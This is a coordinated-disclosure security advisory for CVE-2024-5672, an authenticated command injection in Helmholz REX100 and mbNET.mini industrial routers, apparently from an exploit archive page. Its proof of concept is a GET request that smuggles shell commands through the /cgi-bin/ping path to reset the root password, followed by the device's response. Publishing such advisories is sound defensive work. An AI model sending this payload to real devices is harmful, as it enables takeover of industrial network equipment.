Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Helmholz Industrial Router REX100 / MBConnectline mbNET.mini 2.2.11 Command Injection[6]
- Authored by S. Dietz[7], Basic aGVsbWhvbHo6cm91dGVy[8] | Site cyberdanube.com[9]
-
Helmholz Industrial Router REX100 and MBConnectline mbNET.mini versions 2.2.11 and below suffer from a command injection vulnerability.
- advisories | CVE-2024-5672[10]
- SHA-256 |
b761055352f23f5a57134c6680bfc5402ff5b292ba587377ca30bfacfe35d298
- Download[11] | Favorite[12] | View[13]
Change Mirror[14] Download[15]
CyberDanube Security Research 20240703-0
-------------------------------------------------------------------------------
title| Authenticated Command Injection
product| Helmholz Industrial Router REX100
| MBConnectline mbNET.mini
vulnerable version| <= 2.2.11
fixed version| 2.2.13
CVE number| CVE-2024-5672
impact| High
homepage| https://www.helmholz.de/
| https://mbconnectline.com/
found| 2024-05-08
by| S. Dietz (Office Vienna)
| CyberDanube Security Research
| Vienna | St. Pölten
|
| https://www.cyberdanube.com
-------------------------------------------------------------------------------
Vendor description
-------------------------------------------------------------------------------
"Helmholz is your specialist when it comes to sophisticated products for your
automation projects. With current, clever system solutions from Helmholz, the
high demands placed on industrial networks in times of increasing automation
can be met both reliably and efficiently - including a high level of operating
convenience. The broad product spectrum ranges from a decentralized I/O system
to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT
remote machine access."
Source: https://www.helmholz.de/en/company/about-helmholz/
Vulnerable versions
-------------------------------------------------------------------------------
Helmholz Industrial Router REX100 <= 2.2.11
MBConnectline mbNET.mini <= 2.2.11
Vulnerability overview
-------------------------------------------------------------------------------
1) Authenticated Command Injection (CVE-2024-5672)
A command injection was identified on the webserver. This vulnerability can
only be exploited if a user is authenticated on the web interface. This way,
an attacker can invoke commands and is able to get full control over the whole
device.
Proof of Concept
-------------------------------------------------------------------------------
1) Authenticated Command Injection (CVE-2024-5672)
The following GET request changes the password for the root user and returns
the process list of the device.
-------------------------------------------------------------------------------
GET /cgi-bin/ping;echo$IFS'root:password'|chpasswd;ps;.sh HTTP/1.1
Host: 192.168.25.11
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic aGVsbWhvbHo6cm91dGVy
Connection: close
Upgrade-Insecure-Requests: 1
-------------------------------------------------------------------------------
HTTP/1.0 200 OK
This is haserl version 0.8.0
This program runs as a cgi interpeter, not interactively.
Bug reports to: Nathan Angelacos <Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. >
Password for 'root' changed
PID USER VSZ STAT COMMAND
1 root 2292 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
4 root 0 SW [events/0]
5 root 0 SW [khelper]
8 root 0 SW [async/mgr]
[...]
Solution
-------------------------------------------------------------------------------
Update to latest version: 2.2.13
Workaround
-------------------------------------------------------------------------------
None
Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends Helmholz customers to upgrade the firmware to the latest
version available and to restrict network access to the management interface of
the device.
Contact Timeline
-------------------------------------------------------------------------------
2024-05-15: Contacting Helmholz viaCette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. .
2024-05-15: Receiving security contact for MBConnectline.
2024-05-21: Contact stated they are working on a fix.
2024-06-13: Received advisory from contact and assigned CVE number.
2024-07-01: Contact sends out final release date.
2024-07-03: Coordinated release of advisory with CERT@VDE.
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com
EOF S. Dietz / @2024
File Tags
- ActiveX[21] (933)
- Advisory[22] (85,833)
- Arbitrary[23] (16,789)
- BBS[24] (2,859)
- Bypass[25] (1,847)
- CGI[26] (1,033)
- Code Execution[27] (7,732)
- Conference[28] (691)
- Cracker[29] (844)
- CSRF[30] (3,377)
- DoS[31] (24,921)
- Encryption[32] (2,389)
- Exploit[33] (53,009)
- File Inclusion[34] (4,256)
- File Upload[35] (989)
- Firewall[36] (822)
- Info Disclosure[37] (2,874)
- Intrusion Detection[38] (913)
- Java[39] (3,134)
- JavaScript[40] (895)
- Kernel[41] (7,124)
- Local[42] (14,753)
- Magazine[43] (586)
- Overflow[44] (13,132)
- Perl[45] (1,434)
- PHP[46] (5,219)
- Proof of Concept[47] (2,375)
- Protocol[48] (3,720)
- Python[49] (1,628)
- Remote[50] (31,571)
- Root[51] (3,623)
- Rootkit[52] (524)
- Ruby[53] (629)
- Scanner[54] (1,656)
- Security Tool[55] (8,016)
- Shell[56] (3,270)
- Shellcode[57] (1,217)
- Sniffer[58] (901)
- Spoof[59] (2,269)
- SQL Injection[60] (16,574)
- TCP[61] (2,439)
- Trojan[62] (690)
- UDP[63] (901)
- Virus[64] (669)
- Vulnerability[65] (32,854)
- Web[66] (9,935)
- Whitepaper[67] (3,780)
- x86[68] (967)
- XSS[69] (18,229)
- Other[70]
File Archives
- July 2024[71]
- June 2024[72]
- May 2024[73]
- April 2024[74]
- March 2024[75]
- February 2024[76]
- January 2024[77]
- December 2023[78]
- November 2023[79]
- October 2023[80]
- September 2023[81]
- August 2023[82]
- Older[83]
Systems
- AIX[84] (429)
- Apple[85] (2,090)
- BSD[86] (376)
- CentOS[87] (58)
- Cisco[88] (1,927)
- Debian[89] (7,074)
- Fedora[90] (1,693)
- FreeBSD[91] (1,246)
- Gentoo[92] (4,515)
- HPUX[93] (880)
- iOS[94] (376)
- iPhone[95] (108)
- IRIX[96] (220)
- Juniper[97] (69)
- Linux[98] (50,226)
- Mac OS X[99] (691)
- Mandriva[100] (3,105)
- NetBSD[101] (256)
- OpenBSD[102] (489)
- RedHat[103] (16,193)
- Slackware[104] (941)
- Solaris[105] (1,611)
- SUSE[106] (1,444)
- Ubuntu[107] (9,628)
- UNIX[108] (9,424)
- UnixWare[109] (187)
- Windows[110] (6,665)
- Other[111]
- Services
- Security Services[122]
- Hosting By
- Rokasec[123]